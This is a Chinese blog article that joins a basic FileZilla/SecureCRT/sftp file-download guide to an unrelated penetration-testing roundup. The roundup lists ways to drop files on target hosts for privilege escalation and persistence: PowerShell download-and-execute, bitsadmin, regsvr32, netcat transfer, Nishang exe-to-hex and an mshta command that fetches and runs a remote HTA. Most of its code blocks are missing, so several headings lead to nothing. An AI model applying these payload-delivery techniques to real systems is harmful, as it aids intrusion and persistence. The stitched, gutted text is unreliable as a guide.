linux如何从远程终端下载文件到本地磁盘？

linux一般用作于服务器使用，通常使用文字界面，这里分享下如何从远程终端下载文件到本地磁盘。

1、首先在windows开始菜单可以寻找到filezilla软件，点击他即可启动程序。

2、输入正确的linux主机的ip地址，用户名，密码，以及22端口，点击连接即可登录，登录成功会提示Listing directory /root。

3、接着在linux相应的目录，找到相应的文件或者目录，如下图所示。

4、在对应的文件右击下载即可，在下载之前记得先选择文件存放的目录。

5、这时就可以把文件成功下载在桌面了，到桌面查看下载的文件，就完成了。

第一种方式：

SecureCRT下

上传文件只需在shell终端仿真器中输入命令“rz”，即可从d出的对话框中选择本地磁盘上的文件，利用Zmodem上传到服务器当前路径下。

下载文件只需在shell终端仿真器中输入命令“sz 文件名”，即可利用Zmodem将文件下载到本地某目录下。

通过“File Transfer”可以修改下载到本地的默认路径。设置默认目录：options-->session options-->file transfer。

或者

下载文件存放位置在securtCRT中设置，位于：

英文版 options — session options — X/Y/Zmodem。

中文版 选项— 会话选项— X/Y/Zmodem。

第二种方式：用sftp

securecrt 按下ALT+P就开启新的会话 进行ftp *** 作。

输入:help命令，显示该FTP提供所有的命令

pwd:  查询linux主机所在目录(也就是远程主机目录)

lpwd: 查询本地目录（一般指windows上传文件的目录：我们可以通过查看”选项“下拉框中的”会话选项“，如图二：我们知道本地上传目录为：D:/我的文档）

ls:   查询连接到当前linux主机所在目录有哪些文件

lls:  查询当前本地上传目录有哪些文件

lcd:  改变本地上传目录的路径

cd:   改变远程上传目录

get:  将远程目录中文件下载到本地目录

put:  将本地目录中文件上传到远程主机(linux)

quit: 断开FTP连接

在我们渗透测试的过程中，通常会需要向目标主机传送一些文件，来达到提权，维持控制等目的。因此当不方便进行直接传输时，同时目标主机是能有网络连接的，那么此时就可以通过本地下载这种方法来达到文件传输的目的。此篇文章，我会对互联网上针对win与linux大部分的下载指令来做一个汇总，可能会有疏漏，但汇总的都是经常会用的。

这款工具功能很丰富，可以充当某种功能完备的GUI下载管理器，它拥有一款理想的下载管理器所需要的所有功能，比如它可以恢复下载，可以下载多个文件，出现某个连接问题后，可以重新尝试下载，你甚至可以管理最大的下载带宽。

直接下载：

后台下载:

如果互联网连接出现中断，恢复下载：

从某个密码保护的ftp软件库下载文件：

Curl是另一种高效的下载工具，它可以用来上传或下载文件，只要使用一个简单的命令。它支持暂停和恢复下载程序包，并支持数量最多的Web协议，可预测下载完成还剩余多少时间，可通过进度条来显示下载进度。它是所有Linux发行版的内置工具。

直接下载：

借助-o选项，提供名称，下载文件会以该名称保存；如使用-O选项，文件就会以原始名称保存。

这是wget的出色替代者，是一款轻量级下载实用工具。它实际上是个加速，因为它打开了多路http连接，可下载独立文件片段，因而文件下载起来更快速。

直接下载：

这是一种开源命令行下载加速，支持多个端口，你可以使用最大带宽来下载文件，是一款易于安装、易于使用的工具。

直接下载：

Perl是一门很吊的语言，使用它基本可以实现任何事情，用它实现文件下载也很简单。

执行脚本文件是这样:

Python也是很受欢迎的主流脚本语言，代码清晰且简洁:

Ruby是一个面对对象的语言，Metasploit框架就是用它来实现的，当然他也可以实现像下载文件这样的小任务。

执行脚本文件是这样；

PHP作为一种服务端脚本，也可以实现下载文件这种功能。

执行脚本文件是这样:

一般情况下攻击者使用FTP上传文件需要很多交互的步骤，下面这个 bash 脚本，考虑到了交互的情况，可以直接执行并不会产生交互动作。

当然根据实际情况也可以进入交互终端：

攻击者的电脑上输入：

这个命令会将file的内容输出到本地的1234端口中，然后不论谁连接此端口，file的内容将会发送到连接过来的IP。

目标电脑上的命令：

这条命令将连接攻击者的电脑，接受file内容保存。

PowerShell 是一种winodws原生的脚本语言，对于熟练使用它的人来说，可以实现很多复杂的功能。

下面这两条指令实现了从Internet网络下载一个文件。

可以应用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

文件下载并执行如下：

在1998年Visual Basic最终标准在windows上确定。下面的代码可以实现下载文件，虽然它的长度比Powershell长多了。

在windows中Cscript指令可以允许你执行VBS脚本文件或者对script脚本做一些设置。在windows 7中这个指令并不是必须要用到。但是在windows XP中需要使用这条指令，如下所示:

在Windows Vista以及以后的版本中默认有FTP，可以使用以下命令运行：

上传：

下载：

Bitsadmin是Windows命令行工具，用户可以使用它来创建下载或上传的任务。只能命令下载到指定路径上，win7以上：

mshta http://192.168.3.1/run.htarun.hta 内容如下：

依赖于WScript.shell这个组件:

Regsvr32命令用于注册COM组件，是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令，以命令行方式运行。

WinXP及以上系统的regsvr32.exe在windowssystem32文件夹下；2000系统的regsvr32.exe在winntsystem32文件夹下。

test.data内容：

还可以利用 https://github.com/CroweCybersecurity/ps1encode 生成sct文件：

Windows shares可以加载一个驱动器，然后用命令来复制文件。

加载远程驱动：

当需要把一个exe文件放到目标计算机上时，Nishang可以使用PowerShell允许你把一个exe转换成hex，然后把hex再转换成原来的exe文件：

把exe转成hex文件输入：

打开evil.txt文件，复制内容，然后通过RDP的剪贴板复制进目标计算机，把hex文件还原成exe文件输入：

1.MSXSL.EXE

msxsl.exe是微软用于命令行下处理XSL的一个程序，所以通过他，我们可以执行JavaScript进而执行系统命令。

2.pubprn.vbs在Windows 7以上版本存在一个名为PubPrn.vbs的微软已签名WSH脚本，其位于

3.esentutl.exe/extrac32.exe

4.desktopimgdownldr.exedesktopimgdownldr.exe 位于 Win10 的 system32 文件夹中，原本用于设置锁定屏幕或桌面背景图像的。

普通用户可以用：

这样来下载文件。

可以把C:ProgramData来改成一个普通用户可写的目录。

下载的文件存放于：

管理员用户会多写一个注册表项，所以管理员最好的命令是：

https://xz.aliyun.com/t/1654

https://www.t00ls.net/articles-49501.html

https://evi1cg.me/archives/remote_exec.html

https://www.unixmen.com/top-10-command-line-tools-downloading-linux/

作者：肖洋肖恩、

原文链接：https://www.cnblogs.com/-mo-/p/12109717.html

---